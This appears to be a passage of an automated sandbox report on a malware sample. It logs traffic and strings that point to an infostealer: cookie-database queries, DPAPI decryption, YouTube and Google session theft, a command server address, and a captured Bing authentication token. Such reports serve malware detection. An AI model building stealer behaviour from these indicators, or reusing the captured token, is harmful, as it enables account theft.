                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:37 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 104Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e9 8a ac f7 a3 19 42 b9 c4 65 fa e8 1a 75 96 e6 89 f6 20 b2 8c 99 b2 7e b5 42 92 a3 47 69 cf 77 50 9a 4e 68 bf d6 96 5c d0 b0 1c df 95 c4 f3 35 a4 04 37 fe c5 ba ee e2 d0 30 a8 42 df 75 fa 80 b0 6c 04 70 0b 41 ca 42 87 51 52 ae 61 c1 11 9e 12 a8 4c 50 Data Ascii: %S`Nh&WQY^Beu ~BGiwPNh\570BulpABQRaLP
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:40 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 19 Nov 2022 15:58:52 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.237.194
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.50.106.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.50.106.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.50.106.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.241.126.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.248.147.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.248.147.254
                      Source: RegSvcs.exe, 0000002F.00000002.623527954.000000C0000BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: CP="This is not a P3P policy! See g.co/p3phelp for more info."https://www.youtube.com/getAccountSwitcherEndpoint2022/11/19 16:59:33 invalid cookies equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.624937486.000000C0000F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&passive=1209600&continue=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint&followup=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.624937486.000000C0000F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: (?<=INNERTUBE_CONTEXT_SERIALIZED_DELEGATION_CONTEXT\":\"((?<=PAGE_CL\":).*?(?=(,|}))) https://accounts.google.com/ServiceLogin?service=youtube&passive=1209600&continue=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint&followup=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.623396941.000000C0000AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: (?=\")(?=\")(?=\")"challenge": "(.*?)""challenge": "(.*?)""sessionToken": "(.*?)""sessionToken": "(.*?)""sessionToken": ""sessionRiskCtx": "GetFileAttributesExWSystemFunction036HTTP/1.1 302 Found application/binaryX-Content-Type-OptionsPermissions-PolicyGetTimeZoneInformationPacific Standard Timeyoutube.com;/;CONSENThttps://www.youtube.com65.21.213.208:3000 equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.631927197.000000C0001A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: *.google.com*.bdn.devg.cn*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.gstatic.cn*.gstatic-cn.comgooglecnapps.cngkecnapps.cn*.gkecnapps.cnrecaptcha.net.cnrecaptcha-cn.netwidevine.cn*.widevine.cndoubleclick.cn*.doubleclick.cngvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netadmob-cn.com*.admob-cn.com*.gstatic.com*.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.ytimg.comandroid.com*.android.com*.g.cng.co*.g.cogoo.glwww.goo.glgoogle.comggpht.cnyoutu.be*.ggpht.cnurchin.com*.urchin.comyoutube.comyt.be*.youtube.comyoutubekids.com*.yt.beUSUSCaliforniaSan Francisco150317141638Z150317141638Z450309141638Z450309141638ZCalifornia2.2.5San Francisco2.5.2.5.292.5.29.2.5.29.142.2.52.5.2.5.292.5.29.2.5.29.352.2.52.5.2.5.292.5.29.2.5.29.19 equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.631360527.000000C000184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: CertCreateCertificateContextCertFreeCertificateContextwww.youtube.com equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.634187235.000000C000222000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Host: www.youtube.com equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.631360527.000000C000184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: IKernel32.dllPRAGMA busy_timeout = 5000;PRAGMA locking_mode = NORMAL;PRAGMA synchronous = NORMAL;637962485686793996-3320600880637962485686793996-3320600880GA1.2-4.172648318.1660684298GA1.2-4.172648318.1660684298GA1.2-4.1640056110.1660684298GA1.2-4.1640056110.1660684298GA1.2-2.172648318.1660684298GA1.2-2.172648318.1660684298GA1.2-2.1640056110.1660684298GA1.2-2.1640056110.1660684298GA1.1-4.172648318.1660684298GA1.1-4.172648318.16606842986639696_84_88_104280_84_4469406639696_84_88_104280_84_446940REQUEST_METHODwww.youtube.com equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.633216729.000000C0001FA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Location: https://accounts.google.com/ServiceLogin?service=youtube&passive=1209600&continue=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint&followup=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint equals www.youtube.com (Youtube)
                      Source: explorer.exe, 00000027.00000002.772302955.00000000008F1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.rambler.ru (Rambler)
                      Source: explorer.exe, 00000027.00000002.772302955.00000000008F1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.yahoo.com (Yahoo)
                      Source: RegSvcs.exe, 0000002F.00000002.632210376.000000C0001BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\Crypt32.dllCryptUnprotectData.support.google.comwww.youtube.com:443www.youtube.com:443HTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyNO_PROXYno_proxytcpwww.youtube.comws2_32.dll*.appengine.google.com*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.googleadapis.com*.googlevideo.com*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgoogledownloads.cn*.googledownloads.cn*.recaptcha.net.cn*.recaptcha-cn.netampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.comgoogleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.net*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletagservices-cn.comgoogletagmanager-cn.comgooglesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgoogleflights-cn.net*.googleflights-cn.netgooglesandbox-cn.com*.googlesandbox-cn.com*.metric.gstatic.com*.gcpcdn.gvt1.com*.youtube-nocookie.com*.flash.android.comgoogle-analytics.com*.google-analytics.comgooglecommerce.com*.googlecommerce.comyoutubeeducation.com*.youtubeeducation.com*.youtubekids.comsource.android.google.cncrypt32.dllCertGetCertificateChain*.appengine.google.com*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.googleadapis.com*.googlevideo.com*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgoogledownloads.cn*.googledownloads.cn*.recaptcha.net.cn*.recaptcha-cn.netampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.comgoogleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.net*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletagservices-cn.comgoogletagmanager-cn.comgooglesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgoogleflights-cn.net*.googleflights-cn.netgooglesandbox-cn.com*.googlesandbox-cn.com*.metric.gstatic.com*.gcpcdn.gvt1.com*.youtube-nocookie.com*.flash.android.comgoogle-analytics.com*.google-analytics.comgooglecommerce.com*.googlecommerce.comyoutubeeducation.com*.youtubeeducation.com*.youtubekids.comsource.android.google.cn65.21.213.208:3000 equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: flate: internal error: frame_goaway_has_streamframe_headers_pad_shortframe_rststream_bad_lengarbage collection scangcDrain phase incorrecthttp2: handler panickedhttp: request too largehttps://www.youtube.comindex out of range [%x]interrupted system callinvalid PrintableStringinvalid URI for requestinvalid escape sequenceinvalid m->lockedInt = invalid scalar encodingjson: cannot unmarshal left over markroot jobsmakechan: bad alignmentmalformed HTTP responsemissing port in addressmissing protocol schememissing type in runfinqmultipart: NextPart: %vnanotime returning zeronet/http: abort Handlernetwork not implementedno application protocolno space left on devicenon-zero reserved fieldoperation not permittedoperation not supportedpanic during preemptoffprocresize: invalid argreflect.Value.Interfacereflect.Value.NumMethodreflect.methodValueCallruntime: internal errorruntime: invalid type runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timeskipping Question Classspan has no free stackssql: database is closedstack growth after forksyntax error in patternsystem huge page size (text/css; charset=utf-8text/xml; charset=utf-8too many pointers (>10)truncated tag or lengthunexpected address typeunexpected map key typeunknown empty width argunknown error code 0x%xunpacking Question.Nameunpacking Question.Typeunsupported certificatevarint integer overflowwork.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version(?<=authuser=)[0-9]{1,2}116415321826934814453125582076609134674072265625Azerbaijan Standard TimeBangladesh Standard TimeCape Verde Standard TimeCertFreeCertificateChainCreateToolhelp32SnapshotGODEBUG sys/cpu: value "GetUserProfileDirectoryWMagallanes Standard TimeMontevideo Standard TimeNorth Asia Standard TimePRAGMA auto_vacuum = %d;PRAGMA synchronous = %s;Pacific SA Standard TimeRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeUS Eastern Standard Time", required CPU feature equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: got CONTINUATION for stream %d; expected stream %dhttp: putIdleConn: CloseIdleConnections was calledhttp: suspiciously long trailer after chunked bodyhttps://www.youtube.com/getAccountSwitcherEndpointmallocgc called with gcphase == _GCmarkterminationnet/http: HTTP/1.x transport connection broken: %vnet/http: Transport failed to read from server: %vnet/http: cannot rewind body after connection lossrecursive call during initialization - linker skewreflect.Value.Slice3: slice of unaddressable arrayruntime: unable to acquire - semaphore out of synctls: invalid signature by the server certificate: tls: received unexpected CertificateStatus messagex509: RSA public exponent is not a positive numberx509: invalid RDNSequence: invalid attribute valuex509: missing ASN.1 contents; use ParseCertificate(?<=INNERTUBE_CONTEXT_CLIENT_VERSION\":\").*?(?=\")JSON decoder out of sync - data changing underfoot?SELECT name, encrypted_value, host_key FROM cookiesScanState's Read should not be called. Use ReadRunecrypto/elliptic: Add was called on an invalid pointcrypto/tls: reserved ExportKeyingMaterial label: %sfatal: systemstack called from unexpected goroutinehttp2: invalid Transfer-Encoding request header: %qlimiterEvent.stop: invalid limiter event type foundpotentially overlapping in-use allocations detectedprotocol error: received %T before a SETTINGS frameruntime: netpoll: PostQueuedCompletionStatus failedsql/driver: couldn't convert %v (%T) into type boolsql: driver does not support read-only transactionstls: VerifyHostname called on TLS server connectiontls: server selected unsupported compression formattls: server's identity changed during renegotiationx509: certificate has expired or is not yet valid: Second return value of SQLite function must be errorcasfrom_Gscanstatus: gp->status is not in scan statecrypto/rsa: message too long for RSA public key sizedriver: skip fast-path; continue as if unimplementedhttp2: Transport readFrame error on conn %p: (%T) %vhttp: method cannot contain a Content-Length; got %qmallocgc called without a P or outside bootstrappingprotocol error: received DATA before a HEADERS frameruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Init equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.623396941.000000C0000AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.623527954.000000C0000BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/getAccountSwitcherEndpoint equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.630498328.000000C000120000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.633090312.000000C0001F2000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.631191063.000000C000144000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                      Source: RegSvcs.exe, 0000002F.00000002.632210376.000000C0001BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
                      Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 89192Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1668905810762&AC=1&CPH=4ef661f2; 